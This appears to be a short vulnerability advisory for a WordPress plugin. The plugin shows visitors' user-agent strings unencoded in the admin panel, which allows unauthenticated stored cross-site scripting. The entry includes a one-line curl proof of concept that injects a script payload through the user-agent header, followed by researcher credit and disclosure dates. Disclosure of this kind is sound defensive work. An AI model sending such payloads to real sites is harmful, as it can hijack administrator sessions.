The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user's user agent string without validation or encoding within the WordPress admin panel.
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>" The payload will be executed on the "visitors" page within the WordPress admin panel.
Mesut Cetin
Mesut Cetin
Yes
2021-05-26 (about 12 months ago)
2021-05-27 (about 12 months ago)
2021-07-11 (about 10 months ago)